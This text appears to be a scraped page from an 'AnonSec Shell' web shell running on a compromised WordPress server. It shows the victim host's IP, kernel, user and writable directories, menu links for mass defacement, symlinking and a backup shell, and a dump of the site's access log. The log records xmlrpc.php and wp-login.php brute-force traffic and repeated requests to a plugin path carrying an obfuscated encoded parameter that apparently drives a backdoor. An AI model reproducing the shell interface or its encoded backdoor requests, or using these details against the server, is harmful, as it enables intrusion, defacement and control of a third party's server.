AnonSec Shell
Server IP : 198.244.165.102  /  Your IP : 216.73.216.218   [ Reverse IP ]
Web Server : nginx/1.24.0
System : Linux modovh-ub-01 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : colleary ( 1011)
PHP Version : 8.3.23
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/marinecableservices/logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/marinecableservices/logs/access.log
86.47.33.44 - - [03/Sep/2026:17:47:01 +0100] "GET /what-we-do/ HTTP/1.1" 200 38876 "https://www.marinecableservices.com/contact/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:155.0) Gecko/20100101 Firefox/155.0"
103.177.1.132 - - [03/Sep/2026:17:50:23 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.1)"
103.177.1.132 - - [03/Sep/2026:17:50:29 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/13.0; WordPress/6.3; http://site73699822.com"
103.177.1.132 - - [03/Sep/2026:17:50:51 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:17:51:01 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.1; WordPress/6.4; http://site85726530.com"
103.177.1.132 - - [03/Sep/2026:17:51:14 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.4)"
103.177.1.132 - - [03/Sep/2026:17:51:22 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.1)"
43.135.36.201 - - [03/Sep/2026:17:51:28 +0100] "GET /hello-world/ HTTP/1.1" 200 33015 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
103.177.1.132 - - [03/Sep/2026:17:51:47 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/13.0; WordPress/6.1; http://site63910562.com"
103.177.1.132 - - [03/Sep/2026:17:51:54 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:17:52:05 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:17:52:15 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.3)"
103.177.1.132 - - [03/Sep/2026:17:52:26 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.1)"
103.177.1.132 - - [03/Sep/2026:17:52:37 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
57.141.0.9 - - [03/Sep/2026:17:52:44 +0100] "GET /wp-sitemap.xml HTTP/1.1" 200 261 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
103.177.1.132 - - [03/Sep/2026:17:52:48 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:17:52:58 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.0; WordPress/6.4; http://site47750995.com"
103.177.1.132 - - [03/Sep/2026:17:53:21 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.5; WordPress/6.1; http://site19896297.com"
103.177.1.132 - - [03/Sep/2026:17:53:30 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/13.0; WordPress/6.2; http://site79539956.com"
103.177.1.132 - - [03/Sep/2026:17:53:55 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:17:54:02 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/13.0; WordPress/6.4; http://site25495591.com"
103.177.1.132 - - [03/Sep/2026:17:54:35 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
103.177.1.132 - - [03/Sep/2026:17:54:44 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.5; WordPress/6.4; http://site11713111.com"
103.177.1.132 - - [03/Sep/2026:17:55:06 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:17:55:16 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/13.0; WordPress/6.3; http://site98543219.com"
103.177.1.132 - - [03/Sep/2026:17:55:29 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:17:55:37 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.4)"
103.177.1.132 - - [03/Sep/2026:17:55:49 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.2)"
103.177.1.132 - - [03/Sep/2026:17:55:59 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.5; WordPress/6.4; http://site21904819.com"
103.177.1.132 - - [03/Sep/2026:17:56:20 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.3)"
103.177.1.132 - - [03/Sep/2026:17:56:30 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:17:56:42 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
103.177.1.132 - - [03/Sep/2026:17:56:52 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
103.177.1.132 - - [03/Sep/2026:17:57:04 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.0; WordPress/6.3; http://site82472225.com"
103.177.1.132 - - [03/Sep/2026:17:57:13 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
45.227.253.15 - - [03/Sep/2026:17:57:16 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383735302p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435353135302q3636333836393235643034303662313764303466303236353539316366643563222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/102.0"
103.177.1.132 - - [03/Sep/2026:17:57:36 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:17:57:45 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:17:57:58 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/13.0; WordPress/6.4; http://site85180368.com"
103.177.1.132 - - [03/Sep/2026:17:58:06 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.5; WordPress/6.2; http://site82585323.com"
103.177.1.132 - - [03/Sep/2026:17:58:30 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:17:58:38 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.1; WordPress/6.4; http://site13322036.com"
103.177.1.132 - - [03/Sep/2026:17:58:49 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
146.103.120.184 - - [03/Sep/2026:17:58:58 +0100] "GET /hello-world/ HTTP/1.0" 200 188096 "https://www.marinecableservices.com/hello-world/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
146.103.120.184 - - [03/Sep/2026:17:58:59 +0100] "POST /wp-comments-post.php HTTP/1.0" 302 0 "https://www.marinecableservices.com/hello-world/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.177.1.132 - - [03/Sep/2026:17:58:59 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
146.103.120.184 - - [03/Sep/2026:17:59:00 +0100] "GET /hello-world/ HTTP/1.0" 200 191946 "https://www.marinecableservices.com/hello-world/#comment-699" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.177.1.132 - - [03/Sep/2026:17:59:11 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:17:59:21 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:17:59:32 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
43.157.22.109 - - [03/Sep/2026:17:59:33 +0100] "GET /?p=1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.22.109 - - [03/Sep/2026:17:59:36 +0100] "GET /hello-world/ HTTP/1.1" 200 33015 "https://www.marinecableservices.com/?p=1" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
103.177.1.132 - - [03/Sep/2026:17:59:42 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:17:59:53 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
103.177.1.132 - - [03/Sep/2026:18:00:03 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:00:15 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:18:00:25 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:00:35 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:00:47 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:00:57 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:01:08 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.3)"
103.177.1.132 - - [03/Sep/2026:18:01:18 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:18:01:41 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:01:50 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
198.244.165.102 - - [03/Sep/2026:18:02:08 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383232382p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343632382q3666306135623164656230316531613163663965623033393036313430393832222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:02:12 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.4)"
103.177.1.132 - - [03/Sep/2026:18:02:22 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/13.0; WordPress/6.4; http://site26271824.com"
198.244.165.102 - - [03/Sep/2026:18:02:30 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383235302p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343635302q6535343337623330313838383238646331643862643663393665656265356663222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:02:33 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.3)"
103.177.1.132 - - [03/Sep/2026:18:02:43 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
198.244.165.102 - - [03/Sep/2026:18:02:52 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383237322p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343637322q3834353164313839383234386633653136373530316137326135353433646231222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:03:05 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
198.244.165.102 - - [03/Sep/2026:18:03:14 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383239342p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343639342q3139316166623439656363363766313538383235383436633531303932343161222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:03:15 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.2)"
103.177.1.132 - - [03/Sep/2026:18:03:27 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.5; WordPress/6.4; http://site69241680.com"
198.244.165.102 - - [03/Sep/2026:18:03:36 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383331362p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343731362q6433323636666663653966353830396639326435316663393033356635336438222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:03:36 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:03:47 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:18:03:57 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.1; WordPress/6.2; http://site61206626.com"
198.244.165.102 - - [03/Sep/2026:18:03:58 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383333382p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343733382q3965356338653130623733323337663533323333353864623266313566393431222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:04:08 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:04:18 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.2)"
198.244.165.102 - - [03/Sep/2026:18:04:19 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383335392p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343735392q3562643232393032326632646662663364366263363561363637326435396261222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:04:30 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:04:40 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
198.244.165.102 - - [03/Sep/2026:18:04:41 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383338312p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343738312q6231346531356466313134643338313431656164346131663839353465626437222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:04:52 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack/12.1; WordPress/6.4; http://site11674031.com"
103.177.1.132 - - [03/Sep/2026:18:05:01 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.4)"
198.244.165.102 - - [03/Sep/2026:18:05:03 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383430332p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343830332q3034666439373832646164373264343631653732663934623665616337396262222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:05:13 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:18:05:22 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
198.244.165.102 - - [03/Sep/2026:18:05:25 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383432352p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343832352q3635653536323831383839636333623465333761323561613966326364636466222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:05:34 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
103.177.1.132 - - [03/Sep/2026:18:05:44 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
198.244.165.102 - - [03/Sep/2026:18:05:46 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383434362p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343834362q6536376533396638326636306365613366633466396436326630373865343931222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:06:06 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
198.244.165.102 - - [03/Sep/2026:18:06:08 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383436382p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343836382q3365306631316334626465633333653862383566366261306362333031343534222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:06:16 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.1)"
103.177.1.132 - - [03/Sep/2026:18:06:27 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
198.244.165.102 - - [03/Sep/2026:18:06:30 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383439302p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343839302q6433396466376264306638393766386231373764383931616532616439646139222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:06:37 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "WordPress.com; https://wordpress.com"
103.177.1.132 - - [03/Sep/2026:18:06:48 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
198.244.165.102 - - [03/Sep/2026:18:06:52 +0100] "GET /wp-content/plugins/insert-headers-and-footers/includes/auto-insert/auto-insert/index.php?ARRAY=7o2230223n313738383435383531322p2231223n22687474703n5p2s5p2s7n733033377631332r666s726q72792r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313738383435343931322q3939663736626236346535366630313035646230643763626663303234303863222p2232223n226162666363306334353030316434373238363632663232343932303065643630222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q34312q35332q36342q38302q38352q3234227q HTTP/1.1" 499 0 "-" "-"
103.177.1.132 - - [03/Sep/2026:18:06:58 +0100] "POST /xmlrpc.php HTTP/1.1" 200 415 "-" "Jetpack by WordPress.com"
141.255.164.70 - - [03/Sep/2026:18:07:06 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:06 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:06 +0100] "POST /wp-login.php HTTP/1.1" 200 3149 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:07 +0100] "POST /wp-login.php HTTP/1.1" 200 3116 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:07 +0100] "POST /wp-login.php HTTP/1.1" 200 3113 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:08 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:08 +0100] "POST /wp-login.php HTTP/1.1" 200 3148 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:08 +0100] "POST /wp-login.php HTTP/1.1" 200 3116 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:09 +0100] "POST /wp-login.php HTTP/1.1" 200 3113 "https://marinecableservices.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
141.255.164.70 - - [03/Sep/2026:18:07:09 +0100] "GET /wp-login.php HTTP/1.1" 200 2996 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
